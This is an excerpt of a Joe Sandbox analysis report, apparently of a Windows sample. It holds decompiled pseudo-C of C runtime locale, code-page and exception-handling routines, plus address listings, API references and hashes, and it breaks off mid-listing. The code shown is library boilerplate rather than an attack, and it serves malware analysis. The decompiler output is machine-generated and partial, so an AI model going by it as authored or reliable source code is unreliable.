                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                • String ID:
                                                • API String ID: 949163717-0
                                                • Opcode ID: 27391c59b3b7efec58b7b9bbed3fd8f0f2bb67e8cd5c95caae1316240e7b45d3
                                                • Instruction ID: db1b6157dc829de50f393c20d368dfb5a9f09e2d017c817034fb358363d7b0c9
                                                • Opcode Fuzzy Hash: 27391c59b3b7efec58b7b9bbed3fd8f0f2bb67e8cd5c95caae1316240e7b45d3
                                                • Instruction Fuzzy Hash: C7518271A00225AFEB10DFA5EC41BBE77B8BF65700F144429F512EB590EB70DA449BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E00C2CDFD(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
                                                				intOrPtr* _v8;
                                                				short _v12;
                                                				signed int _v32;
                                                				intOrPtr _v40;
                                                				signed int _v52;
                                                				char _v272;
                                                				short _v292;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t33;
                                                				short* _t34;
                                                				intOrPtr* _t35;
                                                				void* _t37;
                                                				intOrPtr* _t38;
                                                				signed short _t39;
                                                				signed short* _t42;
                                                				intOrPtr _t45;
                                                				void* _t47;
                                                				signed int _t50;
                                                				void* _t52;
                                                				signed int _t56;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t73;
                                                				void* _t77;
                                                				intOrPtr* _t84;
                                                				short* _t86;
                                                				void* _t88;
                                                				intOrPtr* _t91;
                                                				intOrPtr* _t95;
                                                				short _t113;
                                                				void* _t114;
                                                				intOrPtr* _t116;
                                                				intOrPtr _t119;
                                                				signed int* _t120;
                                                				void* _t121;
                                                				intOrPtr* _t123;
                                                				signed short _t125;
                                                				int _t127;
                                                				void* _t128;
                                                				void* _t131;
                                                				signed int _t132;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t84 = _a4;
                                                				_t33 = E00C23663(__ecx, __edx);
                                                				_t113 = 0;
                                                				_v12 = 0;
                                                				_t3 = _t33 + 0x50; // 0x50
                                                				_t123 = _t3;
                                                				_t4 = _t123 + 0x250; // 0x2a0
                                                				_t34 = _t4;
                                                				 *((intOrPtr*)(_t123 + 8)) = 0;
                                                				 *_t34 = 0;
                                                				_t6 = _t123 + 4; // 0x54
                                                				_t116 = _t6;
                                                				_v8 = _t34;
                                                				_t91 = _t84;
                                                				_t35 = _t84 + 0x80;
                                                				 *_t123 = _t84;
                                                				 *_t116 = _t35;
                                                				if( *_t35 != 0) {
                                                					E00C2CD90(0xc38800, 0x16, _t116);
                                                					_t91 =  *_t123;
                                                					_t131 = _t131 + 0xc;
                                                					_t113 = 0;
                                                				}
                                                				_push(_t123);
                                                				if( *_t91 == _t113) {
                                                					E00C2C701(_t84, _t91);
                                                					goto L12;
                                                				} else {
                                                					if( *((intOrPtr*)( *_t116)) == _t113) {
                                                						E00C2C821();
                                                					} else {
                                                						E00C2C788(_t91);
                                                					}
                                                					if( *((intOrPtr*)(_t123 + 8)) == 0) {
                                                						_t77 = E00C2CD90(0xc384f0, 0x40, _t123);
                                                						_t131 = _t131 + 0xc;
                                                						if(_t77 != 0) {
                                                							_push(_t123);
                                                							if( *((intOrPtr*)( *_t116)) == 0) {
                                                								E00C2C821();
                                                							} else {
                                                								E00C2C788(0);
                                                							}
                                                							L12:
                                                						}
                                                					}
                                                				}
                                                				if( *((intOrPtr*)(_t123 + 8)) == 0) {
                                                					L37:
                                                					_t37 = 0;
                                                					goto L38;
                                                				} else {
                                                					_t38 = _t84 + 0x100;
                                                					if( *_t84 != 0 ||  *_t38 != 0) {
                                                						_t39 = E00C2CC4D(_t38, _t123);
                                                					} else {
                                                						_t39 = GetACP();
                                                					}
                                                					_t125 = _t39;
                                                					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
                                                						goto L37;
                                                					} else {
                                                						_t42 = _a8;
                                                						if(_t42 != 0) {
                                                							 *_t42 = _t125;
                                                						}
                                                						_t119 = _a12;
                                                						if(_t119 == 0) {
                                                							L36:
                                                							_t37 = 1;
                                                							L38:
                                                							return _t37;
                                                						} else {
                                                							_t95 = _v8;
                                                							_t15 = _t119 + 0x120; // 0xd0
                                                							_t86 = _t15;
                                                							 *_t86 = 0;
                                                							_t16 = _t95 + 2; // 0x6
                                                							_t114 = _t16;
                                                							do {
                                                								_t45 =  *_t95;
                                                								_t95 = _t95 + 2;
                                                							} while (_t45 != _v12);
                                                							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
                                                							_t47 = E00C29FA3(_t86, 0x55, _v8);
                                                							_t132 = _t131 + 0x10;
                                                							if(_t47 != 0) {
                                                								L39:
                                                								_push(0);
                                                								_push(0);
                                                								_push(0);
                                                								_push(0);
                                                								_push(0);
                                                								E00C1D97B();
                                                								asm("int3");
                                                								_t130 = _t132;
                                                								_t50 =  *0xc42014; // 0x4fdfcf70
                                                								_v52 = _t50 ^ _t132;
                                                								_push(_t86);
                                                								_push(_t125);
                                                								_push(_t119);
                                                								_t52 = E00C23663(_t97, _t114);
                                                								_t87 = _t52;
                                                								_t120 =  *(E00C23663(_t97, _t114) + 0x34c);
                                                								_t127 = E00C2D538(_v40);
                                                								asm("sbb ecx, ecx");
                                                								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                                                								if(_t56 != 0) {
                                                									if(E00C29CB4(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E00C2D66A(_t127) != 0) {
                                                										 *_t120 =  *_t120 | 0x00000004;
                                                										_t120[2] = _t127;
                                                										_t120[1] = _t127;
                                                									}
                                                									_t62 =  !( *_t120 >> 2) & 0x00000001;
                                                								} else {
                                                									 *_t120 =  *_t120 & _t56;
                                                									_t62 = _t56 + 1;
                                                								}
                                                								_pop(_t121);
                                                								_pop(_t128);
                                                								_pop(_t88);
                                                								return E00C17193(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
                                                							} else {
                                                								if(E00C25763(_t86, 0x1001, _t119, 0x40) == 0) {
                                                									goto L37;
                                                								} else {
                                                									_t20 = _t119 + 0x80; // 0x30
                                                									_t86 = _t20;
                                                									_t21 = _t119 + 0x120; // 0xd0
                                                									if(E00C25763(_t21, 0x1002, _t86, 0x40) == 0) {
                                                										goto L37;
                                                									} else {
                                                										_t68 = E00C32DDB(_t86, 0x5f);
                                                										_pop(_t97);
                                                										if(_t68 != 0) {
                                                											L31:
                                                											_t22 = _t119 + 0x120; // 0xd0
                                                											if(E00C25763(_t22, 7, _t86, 0x40) == 0) {
                                                												goto L37;
                                                											} else {
                                                												goto L32;
                                                											}
                                                										} else {
                                                											_t73 = E00C32DDB(_t86, 0x2e);
                                                											_pop(_t97);
                                                											if(_t73 == 0) {
                                                												L32:
                                                												_t119 = _t119 + 0x100;
                                                												if(_t125 != 0xfde9) {
                                                													E00C3176E(_t97, _t125, _t119, 0x10, 0xa);
                                                													goto L36;
                                                												} else {
                                                													_push(5);
                                                													_t72 = E00C29FA3(_t119, 0x10, L"utf8");
                                                													_t132 = _t132 + 0x10;
                                                													if(_t72 != 0) {
                                                														goto L39;
                                                													} else {
                                                														goto L36;
                                                													}
                                                												}
                                                											} else {
                                                												goto L31;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}















































                                                0x00c2ce02
                                                0x00c2ce03
                                                0x00c2ce05
                                                0x00c2ce0a
                                                0x00c2ce11
                                                0x00c2ce13
                                                0x00c2ce16
                                                0x00c2ce16
                                                0x00c2ce19
                                                0x00c2ce19
                                                0x00c2ce1f
                                                0x00c2ce22
                                                0x00c2ce25
                                                0x00c2ce25
                                                0x00c2ce28
                                                0x00c2ce2b
                                                0x00c2ce2d
                                                0x00c2ce33
                                                0x00c2ce35
                                                0x00c2ce3a
                                                0x00c2ce44
                                                0x00c2ce49
                                                0x00c2ce4b
                                                0x00c2ce4e
                                                0x00c2ce4e
                                                0x00c2ce50
                                                0x00c2ce54
                                                0x00c2ce9d
                                                0x00000000
                                                0x00c2ce56
                                                0x00c2ce5b
                                                0x00c2ce64
                                                0x00c2ce5d
                                                0x00c2ce5d
                                                0x00c2ce5d
                                                0x00c2ce6f
                                                0x00c2ce79
                                                0x00c2ce7e
                                                0x00c2ce83
                                                0x00c2ce89
                                                0x00c2ce8d
                                                0x00c2ce96
                                                0x00c2ce8f
                                                0x00c2ce8f
                                                0x00c2ce8f
                                                0x00c2cea2
                                                0x00c2cea2
                                                0x00c2ce83
                                                0x00c2ce6f
                                                0x00c2cea8
                                                0x00c2cfe4
                                                0x00c2cfe4
                                                0x00000000
                                                0x00c2ceae
                                                0x00c2ceae
                                                0x00c2ceb7
                                                0x00c2cec8
                                                0x00c2cebe
                                                0x00c2cebe
                                                0x00c2cebe
                                                0x00c2cecf
                                                0x00c2ced3
                                                0x00000000
                                                0x00c2cef7
                                                0x00c2cef7
                                                0x00c2cefc
                                                0x00c2cefe
                                                0x00c2cefe
                                                0x00c2cf00
                                                0x00c2cf05
                                                0x00c2cfdf
                                                0x00c2cfe1
                                                0x00c2cfe6
                                                0x00c2cfea
                                                0x00c2cf0b
                                                0x00c2cf0b
                                                0x00c2cf0e
                                                0x00c2cf0e
                                                0x00c2cf16
                                                0x00c2cf19
                                                0x00c2cf19
                                                0x00c2cf1c
                                                0x00c2cf1c
                                                0x00c2cf1f
                                                0x00c2cf22
                                                0x00c2cf2c
                                                0x00c2cf36
                                                0x00c2cf3b
                                                0x00c2cf40
                                                0x00c2cfeb
                                                0x00c2cfed
                                                0x00c2cfee
                                                0x00c2cfef
                                                0x00c2cff0
                                                0x00c2cff1
                                                0x00c2cff2
                                                0x00c2cff7
                                                0x00c2cffb
                                                0x00c2d003
                                                0x00c2d00a
                                                0x00c2d00d
                                                0x00c2d00e
                                                0x00c2d012
                                                0x00c2d013
                                                0x00c2d018
                                                0x00c2d020
                                                0x00c2d02f
                                                0x00c2d03b
                                                0x00c2d04c
                                                0x00c2d054
                                                0x00c2d06e
                                                0x00c2d07b
                                                0x00c2d07e
                                                0x00c2d081
                                                0x00c2d081
                                                0x00c2d08b
                                                0x00c2d056
                                                0x00c2d056
                                                0x00c2d058
                                                0x00c2d058
                                                0x00c2d091
                                                0x00c2d092
                                                0x00c2d095
                                                0x00c2d09c
                                                0x00c2cf46
                                                0x00c2cf56
                                                0x00000000
                                                0x00c2cf5c
                                                0x00c2cf5e
                                                0x00c2cf5e
                                                0x00c2cf6a
                                                0x00c2cf78
                                                0x00000000
                                                0x00c2cf7a
                                                0x00c2cf7d
                                                0x00c2cf83
                                                0x00c2cf86
                                                0x00c2cf96
                                                0x00c2cf9b
                                                0x00c2cfa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2cf88
                                                0x00c2cf8b
                                                0x00c2cf91
                                                0x00c2cf94
                                                0x00c2cfab
                                                0x00c2cfab
                                                0x00c2cfb7
                                                0x00c2cfd7
                                                0x00000000
                                                0x00c2cfb9
                                                0x00c2cfb9
                                                0x00c2cfc3
                                                0x00c2cfc8
                                                0x00c2cfcd
                                                0x00000000
                                                0x00c2cfcf
                                                0x00000000
                                                0x00c2cfcf
                                                0x00c2cfcd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2cf94
                                                0x00c2cf86
                                                0x00c2cf78
                                                0x00c2cf56
                                                0x00c2cf40
                                                0x00c2cf05
                                                0x00c2ced3

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • GetACP.KERNEL32(?,?,?,?,?,?,00C2194F,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C2CEBE
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C2194F,?,?,?,00000055,?,-00000050,?,?), ref: 00C2CEE9
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C2D04C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                • String ID: utf8
                                                • API String ID: 607553120-905460609
                                                • Opcode ID: 3e2626ef7641478422190e9276de1331a3c32d211297fe51ac81a48770e07710
                                                • Instruction ID: 6dce7540c6a4f3062fd8b2d784993ac24c63105a743144d0fc426d8a206311bc
                                                • Opcode Fuzzy Hash: 3e2626ef7641478422190e9276de1331a3c32d211297fe51ac81a48770e07710
                                                • Instruction Fuzzy Hash: 08711671600722AADB24ABB5ECC2FAF73A9EF49700F14442AF515D7981EB74EE40D760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00C17B0C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                				char _v0;
                                                				struct _EXCEPTION_POINTERS _v12;
                                                				intOrPtr _v80;
                                                				intOrPtr _v88;
                                                				char _v92;
                                                				intOrPtr _v608;
                                                				intOrPtr _v612;
                                                				void* _v616;
                                                				intOrPtr _v620;
                                                				char _v624;
                                                				intOrPtr _v628;
                                                				intOrPtr _v632;
                                                				intOrPtr _v636;
                                                				intOrPtr _v640;
                                                				intOrPtr _v644;
                                                				intOrPtr _v648;
                                                				intOrPtr _v652;
                                                				intOrPtr _v656;
                                                				intOrPtr _v660;
                                                				intOrPtr _v664;
                                                				intOrPtr _v668;
                                                				char _v808;
                                                				char* _t39;
                                                				long _t49;
                                                				intOrPtr _t51;
                                                				void* _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t57;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				intOrPtr* _t60;
                                                
                                                				_t59 = __esi;
                                                				_t58 = __edi;
                                                				_t57 = __edx;
                                                				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                					_t55 = _a4;
                                                					asm("int 0x29");
                                                				}
                                                				E00C17CD0(_t34);
                                                				 *_t60 = 0x2cc;
                                                				_v632 = E00C18BB0(_t58,  &_v808, 0, 3);
                                                				_v636 = _t55;
                                                				_v640 = _t57;
                                                				_v644 = _t51;
                                                				_v648 = _t59;
                                                				_v652 = _t58;
                                                				_v608 = ss;
                                                				_v620 = cs;
                                                				_v656 = ds;
                                                				_v660 = es;
                                                				_v664 = fs;
                                                				_v668 = gs;
                                                				asm("pushfd");
                                                				_pop( *_t15);
                                                				_v624 = _v0;
                                                				_t39 =  &_v0;
                                                				_v612 = _t39;
                                                				_v808 = 0x10001;
                                                				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                				E00C18BB0(_t58,  &_v92, 0, 0x50);
                                                				_v92 = 0x40000015;
                                                				_v88 = 1;
                                                				_v80 = _v0;
                                                				_t28 = IsDebuggerPresent() - 1; // -1
                                                				_v12.ExceptionRecord =  &_v92;
                                                				asm("sbb bl, bl");
                                                				_v12.ContextRecord =  &_v808;
                                                				_t54 =  ~_t28 + 1;
                                                				SetUnhandledExceptionFilter(0);
                                                				_t49 = UnhandledExceptionFilter( &_v12);
                                                				if(_t49 == 0 && _t54 == 0) {
                                                					_push(3);
                                                					return E00C17CD0(_t49);
                                                				}
                                                				return _t49;
                                                			}


































                                                0x00c17b0c
                                                0x00c17b0c
                                                0x00c17b0c
                                                0x00c17b20
                                                0x00c17b22
                                                0x00c17b25
                                                0x00c17b25
                                                0x00c17b29
                                                0x00c17b2e
                                                0x00c17b46
                                                0x00c17b4c
                                                0x00c17b52
                                                0x00c17b58
                                                0x00c17b5e
                                                0x00c17b64
                                                0x00c17b6a
                                                0x00c17b71
                                                0x00c17b78
                                                0x00c17b7f
                                                0x00c17b86
                                                0x00c17b8d
                                                0x00c17b94
                                                0x00c17b95
                                                0x00c17b9e
                                                0x00c17ba4
                                                0x00c17ba7
                                                0x00c17bad
                                                0x00c17bbc
                                                0x00c17bc8
                                                0x00c17bd3
                                                0x00c17bda
                                                0x00c17be1
                                                0x00c17bec
                                                0x00c17bf4
                                                0x00c17bfd
                                                0x00c17bff
                                                0x00c17c02
                                                0x00c17c04
                                                0x00c17c0e
                                                0x00c17c16
                                                0x00c17c1c
                                                0x00000000
                                                0x00c17c23
                                                0x00c17c26

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C17B18
                                                • IsDebuggerPresent.KERNEL32 ref: 00C17BE4
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C17C04
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00C17C0E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: b429a70e562e55ef76ef81b7a3fe4401bfb312015ac92a0d2f6f14ab59ad2a9b
                                                • Instruction ID: 7dd8abc6acb3b3042727611e666d6e442521bdbdc921830baf7959d75faeb5cf
                                                • Opcode Fuzzy Hash: b429a70e562e55ef76ef81b7a3fe4401bfb312015ac92a0d2f6f14ab59ad2a9b
                                                • Instruction Fuzzy Hash: 623116B5D092189BDB10DFA4D989BCDBBB8AF08304F1041EAE509AB250EB749B859F44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E00C2D210(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
                                                				signed int _v8;
                                                				short _v248;
                                                				signed int _v252;
                                                				intOrPtr _v256;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t50;
                                                				int _t56;
                                                				signed int _t58;
                                                				void* _t74;
                                                				signed int _t78;
                                                				intOrPtr _t80;
                                                				signed int _t81;
                                                				void* _t89;
                                                				signed int _t90;
                                                				signed int _t92;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				signed int _t111;
                                                				signed int _t115;
                                                				intOrPtr* _t117;
                                                				intOrPtr* _t122;
                                                				signed int* _t124;
                                                				int _t126;
                                                				signed int _t127;
                                                				void* _t128;
                                                				void* _t141;
                                                
                                                				_t121 = __edx;
                                                				_t50 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t50 ^ _t127;
                                                				_t94 = E00C23663(__ecx, __edx);
                                                				_t124 =  *(E00C23663(__ecx, __edx) + 0x34c);
                                                				_t126 = E00C2D538(_a4);
                                                				asm("sbb ecx, ecx");
                                                				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
                                                				_v252 = _v252 & 0x00000000;
                                                				if(_t56 == 0) {
                                                					L37:
                                                					 *_t124 = 0;
                                                					_t58 = 1;
                                                					__eflags = 1;
                                                					L38:
                                                					return E00C17193(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
                                                				}
                                                				if(E00C29CB4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
                                                					L16:
                                                					if(( *_t124 & 0x00000300) == 0x300) {
                                                						L36:
                                                						_t58 =  !( *_t124 >> 2) & 0x00000001;
                                                						goto L38;
                                                					}
                                                					asm("sbb eax, eax");
                                                					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
                                                						goto L37;
                                                					}
                                                					_t74 = E00C29CB4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                					if(_t74 != 0) {
                                                						__eflags =  *(_t94 + 0x60);
                                                						if( *(_t94 + 0x60) != 0) {
                                                							goto L36;
                                                						}
                                                						__eflags =  *(_t94 + 0x5c);
                                                						if( *(_t94 + 0x5c) == 0) {
                                                							goto L36;
                                                						}
                                                						__eflags = E00C29CB4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                						if(__eflags != 0) {
                                                							goto L36;
                                                						}
                                                						_push(_t124);
                                                						_t94 = 0;
                                                						_t78 = E00C2D68F(__eflags, _t126, 0);
                                                						__eflags = _t78;
                                                						if(_t78 == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t124 =  *_t124 | 0x00000100;
                                                						__eflags = _t124[1];
                                                						L34:
                                                						if(_t141 == 0) {
                                                							_t124[1] = _t126;
                                                						}
                                                						goto L36;
                                                					}
                                                					_t111 =  *_t124 | 0x00000200;
                                                					 *_t124 = _t111;
                                                					if( *(_t94 + 0x60) == _t74) {
                                                						__eflags =  *(_t94 + 0x5c) - _t74;
                                                						if( *(_t94 + 0x5c) == _t74) {
                                                							goto L20;
                                                						}
                                                						_t122 =  *((intOrPtr*)(_t94 + 0x50));
                                                						_v256 = _t122 + 2;
                                                						do {
                                                							_t80 =  *_t122;
                                                							_t122 = _t122 + 2;
                                                							__eflags = _t80 - _v252;
                                                						} while (_t80 != _v252);
                                                						_t121 = _t122 - _v256 >> 1;
                                                						__eflags = _t122 - _v256 >> 1 -  *(_t94 + 0x5c);
                                                						if(__eflags != 0) {
                                                							_t74 = 0;
                                                							goto L20;
                                                						}
                                                						_push(_t124);
                                                						_t81 = E00C2D68F(__eflags, _t126, 1);
                                                						__eflags = _t81;
                                                						if(_t81 == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t124 =  *_t124 | 0x00000100;
                                                						_t74 = 0;
                                                						L21:
                                                						_t141 = _t124[1] - _t74;
                                                						goto L34;
                                                					}
                                                					L20:
                                                					 *_t124 = _t111 | 0x00000100;
                                                					goto L21;
                                                				}
                                                				asm("sbb eax, eax");
                                                				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
                                                					goto L37;
                                                				}
                                                				_t89 = E00C29CB4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
                                                				_t115 =  *_t124;
                                                				if(_t89 != 0) {
                                                					__eflags = _t115 & 0x00000002;
                                                					if((_t115 & 0x00000002) != 0) {
                                                						goto L16;
                                                					}
                                                					__eflags =  *(_t94 + 0x5c);
                                                					if( *(_t94 + 0x5c) == 0) {
                                                						L12:
                                                						_t121 =  *_t124;
                                                						__eflags = _t121 & 0x00000001;
                                                						if((_t121 & 0x00000001) != 0) {
                                                							goto L16;
                                                						}
                                                						_t90 = E00C2D66A(_t126);
                                                						__eflags = _t90;
                                                						if(_t90 == 0) {
                                                							goto L16;
                                                						}
                                                						_t121 = _t121 | 0x00000001;
                                                						__eflags = _t121;
                                                						 *_t124 = _t121;
                                                						goto L15;
                                                					}
                                                					_t92 = E00C317F0(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
                                                					_t128 = _t128 + 0xc;
                                                					__eflags = _t92;
                                                					if(_t92 != 0) {
                                                						goto L12;
                                                					}
                                                					 *_t124 =  *_t124 | 0x00000002;
                                                					__eflags =  *_t124;
                                                					_t124[2] = _t126;
                                                					_t117 =  *((intOrPtr*)(_t94 + 0x50));
                                                					_t121 = _t117 + 2;
                                                					do {
                                                						_t93 =  *_t117;
                                                						_t117 = _t117 + 2;
                                                						__eflags = _t93 - _v252;
                                                					} while (_t93 != _v252);
                                                					__eflags = _t117 - _t121 >> 1 -  *(_t94 + 0x5c);
                                                					if(_t117 - _t121 >> 1 ==  *(_t94 + 0x5c)) {
                                                						_t124[1] = _t126;
                                                					}
                                                				} else {
                                                					_t124[1] = _t126;
                                                					 *_t124 = _t115 | 0x00000304;
                                                					L15:
                                                					_t124[2] = _t126;
                                                				}
                                                			}
































                                                0x00c2d210
                                                0x00c2d21b
                                                0x00c2d222
                                                0x00c2d230
                                                0x00c2d238
                                                0x00c2d247
                                                0x00c2d253
                                                0x00c2d264
                                                0x00c2d26a
                                                0x00c2d273
                                                0x00c2d44d
                                                0x00c2d44f
                                                0x00c2d451
                                                0x00c2d451
                                                0x00c2d452
                                                0x00c2d460
                                                0x00c2d460
                                                0x00c2d28c
                                                0x00c2d347
                                                0x00c2d352
                                                0x00c2d441
                                                0x00c2d448
                                                0x00000000
                                                0x00c2d448
                                                0x00c2d366
                                                0x00c2d37c
                                                0x00000000
                                                0x00000000
                                                0x00c2d38c
                                                0x00c2d395
                                                0x00c2d403
                                                0x00c2d406
                                                0x00000000
                                                0x00000000
                                                0x00c2d408
                                                0x00c2d40b
                                                0x00000000
                                                0x00000000
                                                0x00c2d41e
                                                0x00c2d420
                                                0x00000000
                                                0x00000000
                                                0x00c2d422
                                                0x00c2d423
                                                0x00c2d427
                                                0x00c2d42f
                                                0x00c2d431
                                                0x00000000
                                                0x00000000
                                                0x00c2d433
                                                0x00c2d439
                                                0x00c2d43c
                                                0x00c2d43c
                                                0x00c2d43e
                                                0x00c2d43e
                                                0x00000000
                                                0x00c2d43c
                                                0x00c2d399
                                                0x00c2d39f
                                                0x00c2d3a4
                                                0x00c2d3b6
                                                0x00c2d3b9
                                                0x00000000
                                                0x00000000
                                                0x00c2d3bb
                                                0x00c2d3c1
                                                0x00c2d3c7
                                                0x00c2d3c7
                                                0x00c2d3ca
                                                0x00c2d3cd
                                                0x00c2d3cd
                                                0x00c2d3dc
                                                0x00c2d3de
                                                0x00c2d3e1
                                                0x00c2d3fd
                                                0x00000000
                                                0x00c2d3fd
                                                0x00c2d3e3
                                                0x00c2d3e7
                                                0x00c2d3ef
                                                0x00c2d3f1
                                                0x00000000
                                                0x00000000
                                                0x00c2d3f3
                                                0x00c2d3f9
                                                0x00c2d3ae
                                                0x00c2d3ae
                                                0x00000000
                                                0x00c2d3ae
                                                0x00c2d3a6
                                                0x00c2d3ac
                                                0x00000000
                                                0x00c2d3ac
                                                0x00c2d2a0
                                                0x00c2d2b6
                                                0x00000000
                                                0x00000000
                                                0x00c2d2c6
                                                0x00c2d2cd
                                                0x00c2d2d1
                                                0x00c2d2e0
                                                0x00c2d2e3
                                                0x00000000
                                                0x00000000
                                                0x00c2d2e5
                                                0x00c2d2e9
                                                0x00c2d32d
                                                0x00c2d32d
                                                0x00c2d32f
                                                0x00c2d332
                                                0x00000000
                                                0x00000000
                                                0x00c2d335
                                                0x00c2d33b
                                                0x00c2d33d
                                                0x00000000
                                                0x00000000
                                                0x00c2d33f
                                                0x00c2d33f
                                                0x00c2d342
                                                0x00000000
                                                0x00c2d342
                                                0x00c2d2f8
                                                0x00c2d2fd
                                                0x00c2d300
                                                0x00c2d302
                                                0x00000000
                                                0x00000000
                                                0x00c2d304
                                                0x00c2d304
                                                0x00c2d307
                                                0x00c2d30a
                                                0x00c2d30d
                                                0x00c2d310
                                                0x00c2d310
                                                0x00c2d313
                                                0x00c2d316
                                                0x00c2d316
                                                0x00c2d323
                                                0x00c2d326
                                                0x00c2d328
                                                0x00c2d328
                                                0x00c2d2d3
                                                0x00c2d2d9
                                                0x00c2d2dc
                                                0x00c2d344
                                                0x00c2d344
                                                0x00c2d344

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
